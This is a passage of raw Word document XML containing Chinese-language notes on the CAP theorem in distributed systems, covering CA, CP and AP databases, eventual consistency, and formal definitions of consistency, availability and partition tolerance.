        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001D5848">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的缩写</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。在分布式系统中，三者不可兼得，只能得到其中之二。所以就有了三个分类：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CA</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据库，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据库，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D7D" w:rsidRPr="00F41A4C" w:rsidRDefault="00CB6D7D" w:rsidP="00E6562D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="54" w:beforeAutospacing="0" w:after="54" w:afterAutospacing="0" w:line="279" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CA</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据库不考虑分区容忍性，对应现实中是数据库就是普通的关系型数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RDBMS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D7D" w:rsidRPr="00F41A4C" w:rsidRDefault="00CB6D7D" w:rsidP="00E6562D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="54" w:beforeAutospacing="0" w:after="54" w:afterAutospacing="0" w:line="279" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据库考虑的是一致性和分区容忍性，这种数据库对分布式系统内的</w:t>
      </w:r>
      <w:r w:rsidRPr="009745B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通信要求</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>比较高，因为要保持数据的一致性，需要做大量的交互。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D7D" w:rsidRPr="00F41A4C" w:rsidRDefault="00CB6D7D" w:rsidP="001A2EF4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="54" w:beforeAutospacing="0" w:after="54" w:afterAutospacing="0" w:line="279" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据库考虑的是实用性和分区容忍性，即外部访问数据，可以更快的得到回应。这时候，数据的一致性就可能得不到满足。比如一个数据，可能外部一个进程在改写这个数据，同时另一个进程在读这个数据，此时，数据显现是不一致的。但是有一点，就是数据库会满足一个</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5848">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最终一致性</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的概念，即过程可能是不一致的，但是到某一个终点，数据就会一致起来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004558AC" w:rsidRPr="00F41A4C" w:rsidRDefault="004558AC" w:rsidP="00D21B5B">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">CAP </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>理论在搞分布式的程序员中已经是路人皆知了。但是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> CAP </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>理论就好比是相对论，虽然所有的人都知道，但是却没有多少人真正理解。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>要真正理解</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> CAP </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>理论必须要读懂它的形式化描述。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>形式化描述中最重要的莫过于对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Consistency, Availability, Partition-tolerance </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的准确定义。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>Consistency (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一致性</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实际上等同于系统领域的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> before-or-after atomicity </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这个术语，或者等同于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> linearizable (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可串行化</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这个术语。具体来说，系统中对一个数据的读和写虽然包含多个子步骤并且会持续一段时间才能执行完，但是在调用者看来，读操作和写操作都必须是单个的即时完成的操作，不存在重叠。对一个写操作，如果系统返回了成功，那么之后到达的读请求都必须读到这个新的数据；如果系统返回失败，那么所有的读，无论是之后发起的，还是和写同时发起的，都不能读到这个数据。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>要说清楚</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Availability </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Partition-tolerance </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>必须要定义好系统的故障模型。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>形式化证明</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中，系统包含多个节点，每个节点可以接收读和写的请求，返回成功或失败，对读还要返回一个数据。和调用者之间的连接是不会中断的，系统的节点也不会失效，唯一的故障就是报文的丢失。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Partition-tolerance </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>指系统中会任意的丢失报文</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最终会有一个报文会到达</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是相对的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Availability </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是指所有的读和写都必须要能终止。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>注：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> “Availability </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是指所有的读和写都必须要能终止</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这句话听上去很奇怪，为什么不是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">“Availability </w:t>
